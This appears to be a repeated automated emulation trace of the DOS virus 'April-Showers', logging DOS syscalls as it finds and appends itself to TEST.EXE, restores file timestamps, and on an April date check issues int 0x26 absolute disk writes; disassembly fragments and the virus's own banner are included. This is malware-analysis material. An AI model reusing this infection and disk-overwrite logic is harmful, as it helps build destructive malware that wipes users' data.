2018-12-25T12:28:48.490110309Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.491728737Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.500456817Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.511712429Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.514744284Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.523196549Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.530302308Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.532591876Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.53785088Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.543126731Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.546040838Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.547489838Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.551630985Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.561441673Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.562848676Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.565483509Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.570295139Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.573143918Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.580919028Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.588696604Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.595673339Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.602608297Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.606873465Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.608898676Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.613092129Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.615879357Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.621959068Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.623682256Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.629599232Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.636010011Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.63887687Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.65254947Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.659565186Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.661354537Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.672567947Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.67984435Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.682880068Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.684984973Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.688075169Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.702329718Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.704910432Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.713419375Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.725025306Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.728611711Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:48.733216264Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:48.735590488Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:48.738329209Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:48.741224798Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:48.359205343Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:48.36182355Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:48.365158702Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:48.371313326Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:48.378502273Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:48.381311122Z	62	PC: 12e49 | Close file
2018-12-25T12:28:48.383408446Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.388789765Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:48.395369712Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.401966507Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.410694811Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.427120055Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:48.442969783Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.451073287Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:48.455225679Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:48.456480328Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:48.459072457Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:48.486760913Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:48.488522353Z	62	PC: 12f4d | Close file
2018-12-25T12:28:48.496293395Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.516440816Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.523088713Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.532762237Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.546967063Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.548980049Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.562336128Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.585385753Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.588205845Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.589599867Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.592689374Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.602339502Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.60477006Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.614136991Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.6301217Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.633522307Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.640546714Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.646930234Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.648989043Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.659843433Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.666436199Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.669396862Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.671723603Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.675029797Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.684409787Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.686091404Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.695034284Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.705154864Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.707954609Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.715467599Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.721901559Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.723918316Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.734885386Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.74191133Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.74486831Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.747201345Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.750512407Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.759534166Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.762131511Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.770334459Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.780041491Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.783062813Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.790439897Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.796727936Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.798740803Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.804156494Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.808900731Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.811745383Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.81433314Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.817277387Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.825771379Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.82911562Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.831085475Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.835519193Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.839160462Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.845985511Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.852281568Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.855058021Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.864654343Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.871290124Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.874999572Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.876889253Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.879816149Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.889565501Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.891538381Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.910318998Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.927142783Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.930361413Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.937103353Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.943654966Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.946140773Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.95665723Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.963493025Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.966969894Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.968498649Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.971388856Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.981098413Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.982972063Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.99110655Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.001452159Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.004204578Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:49.008482654Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:49.012331963Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:49.014010985Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:49.016634602Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:48.381344171Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:48.382484371Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:48.384739511Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:48.389639183Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:48.405343846Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:48.420419077Z	62	PC: 12e49 | Close file
2018-12-25T12:28:48.422324672Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.434683116Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:48.442346568Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.44650388Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.450442198Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.45240615Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:48.469569688Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.476001982Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:48.498611226Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:48.50003614Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:48.503035992Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:48.520400039Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:48.526009709Z	62	PC: 12f4d | Close file
2018-12-25T12:28:48.538783932Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.550306676Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.560933811Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.567995388Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.576062267Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.581317943Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.593390469Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.59991333Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.603619865Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.611464912Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.62415919Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.651050258Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.65262296Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.672558893Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.692574734Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.695615284Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.702463671Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.712073497Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.720699244Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.745684648Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.753031391Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.756010063Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.758049831Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.762924209Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.771994932Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.777218379Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.785576178Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.814815863Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.817383237Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.824427022Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.833259158Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.835398395Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.845384269Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.853112031Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.856830175Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.858492427Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.862436811Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.871447561Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.873158945Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.881544583Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.891604768Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.89440032Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.901609287Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.908194527Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.910205328Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.915278522Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.940336886Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.943701928Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.945240369Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.950486882Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.963518639Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.965001203Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.96746836Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.971938451Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.979332588Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.987883369Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.995384207Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.997562919Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.008248872Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.020185668Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.023221795Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.025687725Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.029055624Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.038194039Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.040674387Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.04907592Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.058801577Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.062302774Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.072698468Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.07918936Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.081941102Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.092177082Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.098826035Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.101956511Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.104400935Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.107844242Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.11721537Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.119869216Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.138731485Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.148932215Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.152501509Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:49.156963541Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:49.159424671Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:49.162471063Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:49.165310416Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:48.780588618Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:48.78293395Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:48.786412763Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:48.792580196Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:48.79992755Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:48.802746082Z	62	PC: 12e49 | Close file
2018-12-25T12:28:48.804828823Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.80824922Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:48.814692945Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.826606371Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.833095714Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.835603249Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:48.854902255Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.861446513Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:48.869006083Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:48.870684284Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:48.873722472Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:48.883644286Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:48.885115337Z	62	PC: 12f4d | Close file
2018-12-25T12:28:48.892621888Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.913684357Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.91625647Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.922580572Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:48.929669834Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:48.93153115Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.941722767Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.949073062Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:48.952358354Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:48.953735Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:48.957064509Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:48.966622926Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:48.968424735Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:48.976772735Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:48.987549928Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:48.990151655Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:48.996951243Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.003977126Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.00603486Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.016055635Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.026258751Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.029297367Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.03094577Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.034775776Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.04473018Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.04668123Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.055527571Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.065916934Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.069441977Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.077265996Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.084209332Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.086303947Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.097111466Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.109590156Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.116448352Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.11843534Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.121925835Z	64	PC: 13413 | Write file or device (See above)
